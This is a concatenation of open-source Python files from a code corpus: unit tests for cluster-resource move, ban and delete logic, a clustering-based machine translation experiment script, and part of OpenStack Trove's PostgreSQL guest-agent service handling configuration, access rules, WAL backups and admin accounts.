    def _check(self, element, master, expected_reports):
        # Run validate_move and compare the produced report list.
        assert_report_item_list_equal(
            self.validate(element, master), expected_reports
        )

    @staticmethod
    def _cannot_move_clone(resource_id):
        return fixture.error(
            report_codes.CANNOT_MOVE_RESOURCE_CLONE, resource_id=resource_id
        )

    @staticmethod
    def _cannot_move_promotable_inner(resource_id, promotable_id):
        return fixture.error(
            report_codes.CANNOT_MOVE_RESOURCE_PROMOTABLE_INNER,
            resource_id=resource_id,
            promotable_id=promotable_id,
        )

    def test_master_false_promotable_clone(self):
        self._check(self._fixture_clone(True), False, [])

    def test_master_true_promotable_clone(self):
        self._check(self._fixture_clone(True), True, [])

    def test_master_true_clone(self):
        self._check(
            self._fixture_clone(False),
            True,
            [self._cannot_move_clone("R-clone")],
        )

    def test_master_false_clone(self):
        self._check(
            self._fixture_clone(False),
            False,
            [self._cannot_move_clone("R-clone")],
        )

    def test_master_false_master(self):
        self._check(self._fixture_master(), False, [])

    def test_master_true_master(self):
        self._check(self._fixture_master(), True, [])

    def test_master_false_promotable_clone_resource(self):
        element = self._fixture_clone(True)
        self._check(
            element.find("./primitive"),
            False,
            [self._cannot_move_promotable_inner("R", "R-clone")],
        )

    def test_master_false_promotable_clone_group(self):
        element = self._fixture_group_clone(True)
        self._check(
            element.find("./group"),
            False,
            [self._cannot_move_promotable_inner("G", "G-clone")],
        )

    def test_master_false_promotable_clone_group_resource(self):
        element = self._fixture_group_clone(True)
        self._check(
            element.find("./group/primitive"),
            False,
            [self._cannot_move_promotable_inner("R", "G-clone")],
        )

    def test_master_true_clone_resource(self):
        element = self._fixture_clone(False)
        self._check(
            element.find("./primitive"), True, [self._cannot_move_clone("R")]
        )

    def test_master_false_clone_resource(self):
        element = self._fixture_clone(False)
        self._check(
            element.find("./primitive"), False, [self._cannot_move_clone("R")]
        )

    def test_master_true_clone_group(self):
        element = self._fixture_group_clone(False)
        self._check(
            element.find("./group"), True, [self._cannot_move_clone("G")]
        )

    def test_master_false_clone_group(self):
        element = self._fixture_group_clone(False)
        self._check(
            element.find("./group"), False, [self._cannot_move_clone("G")]
        )

    def test_master_true_clone_group_resource(self):
        element = self._fixture_group_clone(False)
        self._check(
            element.find("./group/primitive"),
            True,
            [self._cannot_move_clone("R")],
        )

    def test_master_false_clone_group_resource(self):
        element = self._fixture_group_clone(False)
        self._check(
            element.find("./group/primitive"),
            False,
            [self._cannot_move_clone("R")],
        )

    def test_bundle(self):
        self._check(
            self._fixture_bundle(),
            False,
            [
                fixture.error(
                    report_codes.CANNOT_MOVE_RESOURCE_BUNDLE,
                    resource_id="R-bundle",
                ),
            ],
        )

    def test_bundle_resource(self):
        element = self._fixture_bundle()
        self._check(element.find("./primitive"), False, [])
class ValidateBan(ValidateMoveBanClearMixin, TestCase):
    """Run the shared move/ban/clear validation scenarios against
    common.validate_ban.
    """
    validate = staticmethod(common.validate_ban)
    report_code_bad_master = (
        report_codes.CANNOT_BAN_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
    )
class ValidateUnmoveUnban(ValidateMoveBanClearMixin, TestCase):
    """Run the shared move/ban/clear validation scenarios against
    common.validate_unmove_unban.
    """
    validate = staticmethod(common.validate_unmove_unban)
    report_code_bad_master = (
        report_codes.CANNOT_UNMOVE_UNBAN_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
    )
class FindResourcesToDelete(TestCase):
    """Verify that find_resources_to_delete expands a single CIB element
    into the complete list of elements that must be removed with it
    (e.g. a lone primitive drags its wrapping group/clone along).
    """
    # pylint: disable=too-many-public-methods
    def assert_element2element_list(self, element_id, element_id_list):
        """Assert that deleting *element_id* from the shared fixture CIB
        yields exactly the elements named in *element_id_list*, in order.
        """
        self.assertEqual(
            common.find_resources_to_delete(
                fixture_cib.xpath(f'.//*[@id="{element_id}"]')[0]
            ),
            [
                fixture_cib.xpath(f'.//*[@id="{_id}"]')[0]
                for _id in element_id_list
            ],
        )
    def test_primitive(self):
        self.assert_element2element_list("A", ["A"])
    def test_clone(self):
        self.assert_element2element_list("B-clone", ["B-clone", "B"])
    def test_primitive_in_clone(self):
        self.assert_element2element_list("B", ["B-clone", "B"])
    def test_master(self):
        self.assert_element2element_list("C-master", ["C-master", "C"])
    def test_primitive_in_master(self):
        self.assert_element2element_list("C", ["C-master", "C"])
    def test_group(self):
        self.assert_element2element_list("D", ["D", "D1", "D2"])
    def test_primitive_in_group(self):
        # A multi-member group survives removal of one member.
        self.assert_element2element_list("D1", ["D1"])
    def test_clone_with_group(self):
        self.assert_element2element_list(
            "E-clone",
            ["E-clone", "E", "E1", "E2"],
        )
    def test_group_in_clone(self):
        self.assert_element2element_list("E", ["E-clone", "E", "E1", "E2"])
    def test_primitive_in_cloned_group(self):
        self.assert_element2element_list("E2", ["E2"])
    def test_master_with_group(self):
        self.assert_element2element_list(
            "F-master",
            ["F-master", "F", "F1", "F2"],
        )
    def test_group_in_master(self):
        self.assert_element2element_list("F", ["F-master", "F", "F1", "F2"])
    def test_primitive_in_mastered_group(self):
        self.assert_element2element_list("F1", ["F1"])
    def test_empty_bundle(self):
        self.assert_element2element_list("G-bundle", ["G-bundle"])
    def test_bundle_with_primitive(self):
        self.assert_element2element_list("H-bundle", ["H-bundle", "H"])
    def test_primitive_in_bundle(self):
        self.assert_element2element_list("H", ["H"])
    def test_group_with_single_primitive(self):
        self.assert_element2element_list("I", ["I", "I1"])
    def test_single_primitive_in_group(self):
        # Removing the last member of a group removes the group as well.
        self.assert_element2element_list("I1", ["I", "I1"])
    def test_clone_with_group_with_single_primitive(self):
        self.assert_element2element_list("J-clone", ["J-clone", "J", "J1"])
    def test_group_with_single_primitive_in_clone(self):
        self.assert_element2element_list("J", ["J-clone", "J", "J1"])
    def test_single_primitive_in_cloned_group(self):
        self.assert_element2element_list("J1", ["J-clone", "J", "J1"])
    def test_master_with_group_with_single_primitive(self):
        self.assert_element2element_list("K-master", ["K-master", "K", "K1"])
    def test_group_with_single_primitive_in_master(self):
        self.assert_element2element_list("K", ["K-master", "K", "K1"])
    def test_single_primitive_in_mastered_group(self):
        self.assert_element2element_list("K1", ["K-master", "K", "K1"])
| gpl-2.0 |
rsennrich/multidomain_smt | main.py | 1 | 5816 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# please set paths to the required tools in config.py
# this scripts performs (part of) the experiments described in (Sennrich, Schwenk & Aransa 2013).
# Specifically, it takes a vector of (source-side) texts (LM_TEXTS), trains a language model on each,
# and then clusters a development set (DEV_L1/DEV_L2) with K-means clustering (K clusters).
# for each cluster, the set of phrase pairs is extracted with MOSES_TRAINING,
# given a moses config (MOSES_CFG) that uses a PhraseDictionaryMultiModelCounts0 with all desired component models,
# the script starts a moses server instance (MOSES_SERVER, MOSES_SERVER_PORT, MOSES_SERVER_URL) and optimizes the translation model weights for each cluster.
# finally, the script translates the test set (TEST_SET) by assigning each test set sentence to the closest cluster, then using its weights for translation.
# What this script does *not* do (but what is described in (Sennrich, Schwenk & Aransa 2013), is a retuning of the log-linear parameters (MERT) with the optimized translation models,
# and language model switching.
import sys
import os
import shutil
import gzip
from subprocess import Popen, PIPE
#directory which contains scripts (hardcode this if you use PBS or other cluster infrastructure which moves scripts)
sys.path.append('./')
import cluster
import translate
from config import *
def create_clusters():
    """Cluster the development data into K groups and persist the result.

    Runs K-means over the dev set, writes the cluster assignments and the
    file 'persistent_data.txt' into the working directory, and returns the
    list of cluster centroids.
    """
    clusterer = cluster.Cluster(
        LMs, DEV_L1, DEV_L2, K,
        general_lm=GENERAL_LM, working_dir=WORKING_DIR)
    assignments, centroids = clusterer.kmeans()
    clusterer.writedown(assignments)
    clusterer.write_persistent_data(assignments, centroids,
                                    'persistent_data.txt')
    return centroids
def optimize_weights_online():
    """Optimize translation model instance weights for each cluster.

    For every cluster i, run the Moses training script on that cluster's
    bitext to obtain its sorted phrase pair extract, then query the running
    mosesserver to optimize the instance weights on those phrase pairs.
    Uses mosesserver, so no system restart is required.

    Returns a list of K weight vectors, one per cluster.
    Raises RuntimeError if the Moses training script fails.
    """
    weights = []
    for i in range(K):
        temp_model_path = os.path.join(WORKING_DIR, 'model' + str(i))
        bitext_path = os.path.join(WORKING_DIR, str(i))
        specific_options = ['-root-dir', temp_model_path,
                            '-corpus', bitext_path,
                            '-f', 's', '-e', 't']
        train_cmd = MOSES_TRAINING + specific_options
        p = Popen(train_cmd)
        returncode = p.wait()
        if returncode != 0:
            # Fail early with a clear message; otherwise a failed extraction
            # only surfaces later as a missing/corrupt extract file.
            raise RuntimeError(
                'Moses training failed for cluster %d (exit code %d)'
                % (i, returncode))
        extract_file = os.path.join(temp_model_path, 'model',
                                    'extract.sorted.gz')
        # Close the gzip handle deterministically instead of leaking it.
        extract = gzip.open(extract_file)
        try:
            phrase_pairs = read_phrase_pairs(extract)
        finally:
            extract.close()
        weight_flat = translate.optimize(phrase_pairs, MOSES_SERVER_URL)
        weights.append(weight_flat)
    sys.stderr.write('All weights:\n')
    for w in weights:
        sys.stderr.write(' '.join(map(str, w)) + '\n')
    sys.stderr.write('\n')
    return weights
def read_phrase_pairs(input_object):
    """Convert a Moses extract file into a list of phrase pairs.

    *input_object* is any iterable of ' ||| '-separated lines; the first
    two fields of each line become a (source, target) tuple.
    """
    return [
        (fields[0], fields[1])
        for fields in (line.split(' ||| ') for line in input_object)
    ]
def translate_text(text, centroids, weights, output_file):
    """Translate a text with given centroids and instance weights.

    Each input sentence is assigned to the closest centroid, and the
    corresponding instance weights are used during translation.

    :param text: path of the source-language input file.
    :param centroids: cluster centroids from the clustering step.
    :param weights: per-cluster instance weight vectors.
    :param output_file: path where the translation is written.
    """
    # Use a context manager so the input file handle is always closed
    # (the original open(...).readlines() leaked it).
    with open(text, 'r') as f:
        sent_in = f.readlines()
    C = cluster.Cluster(LMs, None, None, K, general_lm=GENERAL_LM,
                        working_dir=WORKING_DIR)
    weighted_text = translate.assign_weights(sent_in, C, centroids, weights)
    translate.translate_concurrent(weighted_text, MOSES_SERVER_URL,
                                   output_file, NUM_PROCESSES)
def write_weights_to_file(weights, f):
    """Write one whitespace-separated weight vector per line to *f*.

    :param weights: iterable of numeric weight vectors.
    :param f: file name, relative to WORKING_DIR.
    """
    # Context manager guarantees the handle is closed even if a write
    # fails (the original only closed it on the success path).
    with open(os.path.join(WORKING_DIR, f), 'w') as fobj:
        for w in weights:
            fobj.write(' '.join(map(str, w)) + '\n')
if __name__ == '__main__':
    if not os.path.exists(WORKING_DIR):
        os.mkdir(WORKING_DIR)
    # copy files to working directories so you can re-use config
    shutil.copy(sys.argv[0], WORKING_DIR)
    shutil.copy('cluster.py', WORKING_DIR)
    shutil.copy('translate.py', WORKING_DIR)
    shutil.copy('config.py', WORKING_DIR)
    # train LMs: either reuse pre-built LM files (USING_LM_PATHS) or train
    # one SRILM model per text in LM_TEXTS (plus an optional general LM).
    GENERAL_LM = None
    LMs = []
    if USING_LM_PATHS:
        if GENERAL_LM_TEXT:
            GENERAL_LM = cluster.SRILM_interface(GENERAL_LM_TEXT, order=LM_ORDER)
        LMs = [cluster.SRILM_interface(f, order=LM_ORDER) for f in LM_TEXTS]
    else:
        if GENERAL_LM_TEXT:
            # LM file name is derived from the text file's base name.
            lm_name = os.path.basename(GENERAL_LM_TEXT).split('.')[0] + '.lm'
            lm_name = os.path.join(LM_DIR, lm_name)
            GENERAL_LM = cluster.SRILM_interface(lm_name, order=LM_ORDER, text=GENERAL_LM_TEXT)
        for textfile in LM_TEXTS:
            lm_name = os.path.basename(textfile).split('.')[0] + '.lm'
            lm_name = os.path.join(LM_DIR, lm_name)
            LMs.append(cluster.SRILM_interface(lm_name, order=LM_ORDER, text=textfile))
    sys.stderr.write('Executing: ' + ' '.join(MOSES_SERVER) + '\n')
    p = Popen(MOSES_SERVER) # we start server first because it needs to be up when we start translating.
    # if not already done, cluster development data
    if os.path.exists(os.path.join(WORKING_DIR, 'persistent_data.txt')):
        centroids = translate.read_centroids(os.path.join(WORKING_DIR, 'persistent_data.txt'))
    else:
        centroids = create_clusters()
    # if not already done, optimize instance weights for each cluster
    if os.path.exists(os.path.join(WORKING_DIR, 'persistent_weights.txt')):
        weights = translate.read_weights(os.path.join(WORKING_DIR, 'persistent_weights.txt'))
    else:
        weights = optimize_weights_online()
        write_weights_to_file(weights, 'persistent_weights.txt')
    # translate a new text
    translate_text(TEST_SET, centroids, weights, os.path.join(WORKING_DIR, 'output.txt'))
    # shut the moses server down once translation is finished
    p.kill()
| gpl-2.0 |
Tesora-Release/tesora-trove | trove/guestagent/datastore/postgresql/service.py | 1 | 38986 | # Copyright (c) 2013 OpenStack Foundation
# Copyright (c) 2016 Tesora, Inc.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import os
import re
from oslo_log import log as logging
import psycopg2
from trove.common import cfg
from trove.common import exception
from trove.common.i18n import _
from trove.common import instance
from trove.common import pagination
from trove.common.stream_codecs import PropertiesCodec
from trove.common import utils
from trove.guestagent.common.configuration import ConfigurationManager
from trove.guestagent.common.configuration import OneFileOverrideStrategy
from trove.guestagent.common import guestagent_utils
from trove.guestagent.common import operating_system
from trove.guestagent.common.operating_system import FileMode
from trove.guestagent.datastore.postgresql import pgsql_query
from trove.guestagent.datastore import service
from trove.guestagent.db import models
from trove.guestagent import pkg
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
# Names of the configuration-manager override namespaces used by PgSqlApp
# to group the WAL/backup settings and the debug-logging setting so they
# can be applied and removed as a unit.
BACKUP_CFG_OVERRIDE = 'PgBaseBackupConfig'
DEBUG_MODE_OVERRIDE = 'DebugLevelOverride'
class PgSqlApp(object):
    """Manage the PostgreSQL server installed on this guest instance.

    Wraps service control (start/stop/restart), configuration management
    (postgresql.conf, pg_hba.conf), backup/WAL settings and superuser
    administration for the locally installed PostgreSQL server.
    """
    OS = operating_system.get_os()
    LISTEN_ADDRESSES = ['*'] # Listen on all available IP (v4/v6) interfaces.
    ADMIN_USER = 'os_admin' # Trove's administrative user.
    def __init__(self):
        super(PgSqlApp, self).__init__()
        self._current_admin_user = None
        self.status = PgSqlAppStatus(self.pgsql_extra_bin_dir)
        # Configuration overrides are stored next to the main config file.
        revision_dir = guestagent_utils.build_file_path(
            os.path.dirname(self.pgsql_config),
            ConfigurationManager.DEFAULT_STRATEGY_OVERRIDES_SUB_DIR)
        self.configuration_manager = ConfigurationManager(
            self.pgsql_config, self.pgsql_owner, self.pgsql_owner,
            PropertiesCodec(
                delimiter='=',
                string_mappings={'on': True, 'off': False, "''": None}),
            requires_root=True,
            override_strategy=OneFileOverrideStrategy(revision_dir))
    @property
    def service_candidates(self):
        # Candidate system service names for the PostgreSQL daemon.
        return ['postgresql']
    @property
    def pgsql_owner(self):
        # System account owning the PostgreSQL files and processes.
        return 'postgres'
    @property
    def default_superuser_name(self):
        # Built-in PostgreSQL superuser account name.
        return "postgres"
    @property
    def pgsql_base_data_dir(self):
        return '/var/lib/postgresql/'
    @property
    def pgsql_pid_file(self):
        return guestagent_utils.build_file_path(self.pgsql_run_dir,
                                                'postgresql.pid')
    @property
    def pgsql_run_dir(self):
        return '/var/run/postgresql/'
    @property
    def pgsql_extra_bin_dir(self):
        """Redhat and Ubuntu packages for PgSql do not place 'extra' important
        binaries in /usr/bin, but rather in a directory like /usr/pgsql-9.4/bin
        in the case of PostgreSQL 9.4 for RHEL/CentOS
        """
        return {
            operating_system.DEBIAN: '/usr/lib/postgresql/%s/bin/',
            operating_system.REDHAT: '/usr/pgsql-%s/bin/',
            operating_system.SUSE: '/usr/bin/'
        }[self.OS] % self.pg_version[1]
    @property
    def pgsql_config(self):
        return self._find_config_file('postgresql.conf')
    @property
    def pgsql_hba_config(self):
        return self._find_config_file('pg_hba.conf')
    @property
    def pgsql_ident_config(self):
        return self._find_config_file('pg_ident.conf')
    def _find_config_file(self, name_pattern):
        """Return the path of the config file matching *name_pattern* under
        the version-specific configuration directory.
        The shortest matching path is chosen (i.e. the one closest to the
        version root, skipping deeper copies).
        """
        version_base = guestagent_utils.build_file_path(self.pgsql_config_dir,
                                                        self.pg_version[1])
        return sorted(operating_system.list_files_in_directory(
            version_base, recursive=True, pattern=name_pattern,
            as_root=True), key=len)[0]
    @property
    def pgsql_config_dir(self):
        return {
            operating_system.DEBIAN: '/etc/postgresql/',
            operating_system.REDHAT: '/var/lib/postgresql/',
            operating_system.SUSE: '/var/lib/pgsql/'
        }[self.OS]
    @property
    def pgsql_log_dir(self):
        return "/var/log/postgresql/"
    def build_admin(self):
        """Return a PgSqlAdmin bound to the current administrative user."""
        return PgSqlAdmin(self.get_current_admin_user())
    def update_overrides(self, context, overrides, remove=False):
        """Apply or remove user-level configuration overrides."""
        if remove:
            self.configuration_manager.remove_user_override()
        elif overrides:
            self.configuration_manager.apply_user_override(overrides)
    def set_current_admin_user(self, user):
        self._current_admin_user = user
    def get_current_admin_user(self):
        """Return the account used for administrative connections.
        Before Trove's own admin account exists (fresh install), fall back
        to the built-in 'postgres' superuser.
        """
        if self._current_admin_user is not None:
            return self._current_admin_user
        if self.status.is_installed:
            return models.PostgreSQLUser(self.ADMIN_USER)
        return models.PostgreSQLUser(self.default_superuser_name)
    def apply_overrides(self, context, overrides):
        self.reload_configuration()
    def reload_configuration(self):
        """Send a signal to the server, causing configuration files to be
        reloaded by all server processes.
        Active queries or connections to the database will not be
        interrupted.
        NOTE: Do not use the 'SET' command as it only affects the current
        session.
        """
        self.build_admin().psql(
            "SELECT pg_reload_conf()")
    def reset_configuration(self, context, configuration):
        """Reset the PgSql configuration to the one given.
        """
        config_contents = configuration['config_contents']
        self.configuration_manager.save_configuration(config_contents)
    def start_db_with_conf_changes(self, context, config_contents):
        """Starts the PgSql instance with a new configuration."""
        if self.status.is_running:
            raise RuntimeError(_("The service is still running."))
        self.configuration_manager.save_configuration(config_contents)
        # The configuration template has to be updated with
        # guestagent-controlled settings.
        self.apply_initial_guestagent_configuration()
        self.start_db()
    def apply_initial_guestagent_configuration(self):
        """Update guestagent-controlled configuration properties.
        """
        LOG.debug("Applying initial guestagent configuration.")
        file_locations = {
            'data_directory': self._quote(self.pgsql_data_dir),
            'hba_file': self._quote(self.pgsql_hba_config),
            'ident_file': self._quote(self.pgsql_ident_config),
            'external_pid_file': self._quote(self.pgsql_pid_file),
            'unix_socket_directories': self._quote(self.pgsql_run_dir),
            'listen_addresses': self._quote(','.join(self.LISTEN_ADDRESSES)),
            'port': cfg.get_configuration_property('postgresql_port')}
        self.configuration_manager.apply_system_override(file_locations)
        self._apply_access_rules()
    @staticmethod
    def _quote(value):
        # postgresql.conf string values must be single-quoted.
        return "'%s'" % value
    def _apply_access_rules(self):
        LOG.debug("Applying database access rules.")
        # Connections to all resources are granted.
        #
        # Local access from administrative users is implicitly trusted.
        #
        # Remote access from the Trove's account is always rejected as
        # it is not needed and could be used by malicious users to hijack the
        # instance.
        #
        # Connections from other accounts always require a double-MD5-hashed
        # password.
        #
        # Make the rules readable only by the Postgres service.
        #
        # NOTE: The order of entries is important.
        # The first failure to authenticate stops the lookup.
        # That is why the 'local' connections validate first.
        # The OrderedDict is necessary to guarantee the iteration order.
        local_admins = ','.join([self.default_superuser_name, self.ADMIN_USER])
        remote_admins = self.ADMIN_USER
        access_rules = OrderedDict(
            [('local', [['all', local_admins, None, 'trust'],
                        ['replication', local_admins, None, 'trust'],
                        ['all', 'all', None, 'md5']]),
             ('host', [['all', local_admins, '127.0.0.1/32', 'trust'],
                       ['all', local_admins, '::1/128', 'trust'],
                       ['all', local_admins, 'localhost', 'trust'],
                       ['all', remote_admins, '0.0.0.0/0', 'reject'],
                       ['all', remote_admins, '::/0', 'reject'],
                       ['all', 'all', '0.0.0.0/0', 'md5'],
                       ['all', 'all', '::/0', 'md5']])
             ])
        operating_system.write_file(self.pgsql_hba_config, access_rules,
                                    PropertiesCodec(
                                        string_mappings={'\t': None}),
                                    as_root=True)
        operating_system.chown(self.pgsql_hba_config,
                               self.pgsql_owner, self.pgsql_owner,
                               as_root=True)
        operating_system.chmod(self.pgsql_hba_config, FileMode.SET_USR_RO,
                               as_root=True)
    def disable_backups(self):
        """Reverse overrides applied by PgBaseBackup strategy"""
        if not self.configuration_manager.has_system_override(
                BACKUP_CFG_OVERRIDE):
            return
        LOG.info("Removing configuration changes for backups")
        self.configuration_manager.remove_system_override(BACKUP_CFG_OVERRIDE)
        self.remove_wal_archive_dir()
        self.restart()
    def enable_backups(self):
        """Apply necessary changes to config to enable WAL-based backups
        if we are using the PgBaseBackup strategy
        """
        LOG.info("Checking if we need to apply changes to WAL config")
        if 'PgBaseBackup' not in self.backup_strategy:
            return
        if self.configuration_manager.has_system_override(BACKUP_CFG_OVERRIDE):
            return
        LOG.info("Applying changes to WAL config for use by base backups")
        arch_cmd = "'test ! -f {wal_arch}/%f && cp %p {wal_arch}/%f'".format(
            wal_arch=self.wal_archive_location
        )
        opts = {
            # FIXME(atomic77) These spaces after the options are needed until
            # DBAAS-949 is fixed
            'wal_level ': 'hot_standby',
            'archive_mode ': 'on',
            'max_wal_senders': 8,
            # 'checkpoint_segments ': 8,
            'wal_keep_segments': 8,
            'archive_command': arch_cmd
        }
        if self.pg_version[1] in ('9.4', '9.5'):
            opts['wal_log_hints'] = 'on'
        self.configuration_manager.apply_system_override(opts,
                                                         BACKUP_CFG_OVERRIDE)
        # self.enable_debugging(level=1)
        self.restart()
    def disable_debugging(self, level=1):
        """Disable debug-level logging in postgres"""
        self.configuration_manager.remove_system_override(DEBUG_MODE_OVERRIDE)
    def enable_debugging(self, level=1):
        """Enable debug-level logging in postgres"""
        opt = {'log_min_messages': 'DEBUG%s' % level}
        self.configuration_manager.apply_system_override(opt,
                                                         DEBUG_MODE_OVERRIDE)
    def install(self, context, packages):
        """Install one or more packages that postgresql needs to run.
        The packages parameter is a string representing the package names that
        should be given to the system's package manager.
        """
        LOG.debug(
            "{guest_id}: Beginning PgSql package installation.".format(
                guest_id=CONF.guest_id
            )
        )
        self.recreate_wal_archive_dir()
        packager = pkg.Package()
        if not packager.pkg_is_installed(packages):
            try:
                LOG.info(
                    _("{guest_id}: Installing ({packages}).").format(
                        guest_id=CONF.guest_id,
                        packages=packages,
                    )
                )
                packager.pkg_install(packages, {}, 1000)
            except (pkg.PkgAdminLockError, pkg.PkgPermissionError,
                    pkg.PkgPackageStateError, pkg.PkgNotFoundError,
                    pkg.PkgTimeout, pkg.PkgScriptletError,
                    pkg.PkgDownloadError, pkg.PkgSignError,
                    pkg.PkgBrokenError):
                LOG.exception(
                    "{guest_id}: There was a package manager error while "
                    "trying to install ({packages}).".format(
                        guest_id=CONF.guest_id,
                        packages=packages,
                    )
                )
                raise
            except Exception:
                LOG.exception(
                    "{guest_id}: The package manager encountered an unknown "
                    "error while trying to install ({packages}).".format(
                        guest_id=CONF.guest_id,
                        packages=packages,
                    )
                )
                raise
            else:
                self.start_db()
        LOG.debug(
            "{guest_id}: Completed package installation.".format(
                guest_id=CONF.guest_id,
            )
        )
    @property
    def pgsql_recovery_config(self):
        # recovery.conf is present only on standby/replica servers.
        return os.path.join(self.pgsql_data_dir, "recovery.conf")
    @property
    def pgsql_data_dir(self):
        return os.path.dirname(self.pg_version[0])
    @property
    def pg_version(self):
        """Find the database version file stored in the data directory.
        :returns: A tuple with the path to the version file
            (in the root of the data directory) and the version string.
        """
        version_files = operating_system.list_files_in_directory(
            self.pgsql_base_data_dir, recursive=True, pattern='PG_VERSION',
            as_root=True)
        # Pick the shortest path, i.e. the file closest to the base dir.
        version_file = sorted(version_files, key=len)[0]
        version = operating_system.read_file(version_file, as_root=True)
        return version_file, version.strip()
    def restart(self):
        self.status.restart_db_service(
            self.service_candidates, CONF.state_change_wait_time)
    def start_db(self, enable_on_boot=True, update_db=False):
        self.status.start_db_service(
            self.service_candidates, CONF.state_change_wait_time,
            enable_on_boot=enable_on_boot, update_db=update_db)
    def stop_db(self, do_not_start_on_reboot=False, update_db=False):
        self.status.stop_db_service(
            self.service_candidates, CONF.state_change_wait_time,
            disable_on_boot=do_not_start_on_reboot, update_db=update_db)
    def secure(self, context):
        """Create an administrative user for Trove.
        Force password encryption.
        Also disable the built-in superuser
        """
        password = utils.generate_random_password()
        os_admin_db = models.PostgreSQLSchema(self.ADMIN_USER)
        os_admin = models.PostgreSQLUser(self.ADMIN_USER, password)
        os_admin.databases.append(os_admin_db.serialize())
        postgres = models.PostgreSQLUser(self.default_superuser_name)
        admin = PgSqlAdmin(postgres)
        admin._create_database(context, os_admin_db)
        admin._create_admin_user(context, os_admin,
                                 encrypt_password=True)
        # Lock the built-in superuser; from now on all administrative
        # connections go through the new 'os_admin' account.
        PgSqlAdmin(os_admin).alter_user(context, postgres, None,
                                        'NOSUPERUSER', 'NOLOGIN')
        self.set_current_admin_user(os_admin)
    def pg_current_xlog_location(self):
        """Wrapper for pg_current_xlog_location()
        Cannot be used against a running slave
        """
        r = self.build_admin().query("SELECT pg_current_xlog_location()")
        return r[0][0]
    def pg_last_xlog_replay_location(self):
        """Wrapper for pg_last_xlog_replay_location()
        For use on standby servers
        """
        r = self.build_admin().query("SELECT pg_last_xlog_replay_location()")
        return r[0][0]
    def pg_is_in_recovery(self):
        """Wrapper for pg_is_in_recovery() for detecting a server in
        standby mode
        """
        r = self.build_admin().query("SELECT pg_is_in_recovery()")
        return r[0][0]
    def pg_primary_host(self):
        """There seems to be no way to programmatically determine this
        on a hot standby, so grab what we have written to the recovery
        file
        """
        r = operating_system.read_file(self.pgsql_recovery_config,
                                       as_root=True)
        # NOTE(review): the pattern is not a raw string and the dots are
        # unescaped, so '.' matches any character; it works for dotted IPv4
        # addresses but is looser than intended -- confirm before tightening.
        regexp = re.compile("host=(\d+.\d+.\d+.\d+) ")
        m = regexp.search(r)
        return m.group(1)
    def recreate_wal_archive_dir(self):
        # Wipe and recreate the WAL archive directory owned by postgres.
        wal_archive_dir = self.wal_archive_location
        operating_system.remove(wal_archive_dir, force=True, recursive=True,
                                as_root=True)
        operating_system.create_directory(wal_archive_dir,
                                          user=self.pgsql_owner,
                                          group=self.pgsql_owner,
                                          force=True, as_root=True)
    def remove_wal_archive_dir(self):
        wal_archive_dir = self.wal_archive_location
        operating_system.remove(wal_archive_dir, force=True, recursive=True,
                                as_root=True)
    def is_root_enabled(self, context):
        """Return True if there is a superuser account enabled.
        """
        results = self.build_admin().query(
            pgsql_query.UserQuery.list_root(),
            timeout=30,
        )
        # There should be only one superuser (Trove's administrative account).
        # NOTE(review): assumes the query always returns at least one row
        # (the admin account); an empty result would raise IndexError.
        return len(results) > 1 or (results[0][0] != self.ADMIN_USER)
    def enable_root(self, context, root_password=None):
        """Create a superuser user or reset the superuser password.
        The default PostgreSQL administration account is 'postgres'.
        This account always exists and cannot be removed.
        Its attributes and access can however be altered.
        Clients can connect from the localhost or remotely via TCP/IP:
        Local clients (e.g. psql) can connect from a preset *system* account
        called 'postgres'.
        This system account has no password and is *locked* by default,
        so that it can be used by *local* users only.
        It should *never* be enabled (or it's password set)!!!
        That would just open up a new attack vector on the system account.
        Remote clients should use a build-in *database* account of the same
        name. It's password can be changed using the "ALTER USER" statement.
        Access to this account is disabled by Trove exposed only once the
        superuser access is requested.
        Trove itself creates its own administrative account.
        {"_name": "postgres", "_password": "<secret>"}
        """
        user = self.build_root_user(root_password)
        self.build_admin().alter_user(
            context, user, None, *PgSqlAdmin.ADMIN_OPTIONS)
        return user.serialize()
    def build_root_user(self, password=None):
        return models.PostgreSQLRootUser(password=password)
    def pg_start_backup(self, backup_label):
        # Begin an on-line ("exclusive") base backup.
        r = self.build_admin().query(
            "SELECT pg_start_backup('%s', true)" % backup_label)
        return r[0][0]
    def pg_xlogfile_name(self, start_segment):
        r = self.build_admin().query(
            "SELECT pg_xlogfile_name('%s')" % start_segment)
        return r[0][0]
    def pg_stop_backup(self):
        r = self.build_admin().query("SELECT pg_stop_backup()")
        return r[0][0]
    def disable_root(self, context):
        """Generate a new random password for the public superuser account.
        Do not disable its access rights. Once enabled the account should
        stay that way.
        """
        self.enable_root(context)
    def enable_root_with_password(self, context, root_password=None):
        return self.enable_root(context, root_password)
    @property
    def wal_archive_location(self):
        return cfg.get_configuration_property('wal_archive_location')
    @property
    def backup_strategy(self):
        return cfg.get_configuration_property('backup_strategy')
    def save_files_pre_upgrade(self, mount_point):
        """Copy the config directory onto the data volume before upgrade.
        :returns: dict of saved locations, passed back to
            restore_files_post_upgrade after the upgrade completes.
        """
        LOG.debug('Saving files pre-upgrade.')
        mnt_etc_dir = os.path.join(mount_point, 'save_etc')
        if self.OS != operating_system.REDHAT:
            # No need to store the config files away for Redhat because
            # they are already stored in the data volume.
            operating_system.remove(mnt_etc_dir, force=True, as_root=True)
            operating_system.copy(self.pgsql_config_dir, mnt_etc_dir,
                                  preserve=True, recursive=True, as_root=True)
        return {'save_etc': mnt_etc_dir}
    def restore_files_post_upgrade(self, upgrade_info):
        """Restore the config directory saved by save_files_pre_upgrade."""
        LOG.debug('Restoring files post-upgrade.')
        if self.OS != operating_system.REDHAT:
            # No need to restore the config files for Redhat because
            # they are already in the data volume.
            operating_system.copy('%s/.' % upgrade_info['save_etc'],
                                  self.pgsql_config_dir,
                                  preserve=True, recursive=True,
                                  force=True, as_root=True)
        operating_system.remove(upgrade_info['save_etc'], force=True,
                                as_root=True)
class PgSqlAppStatus(service.BaseDbStatus):
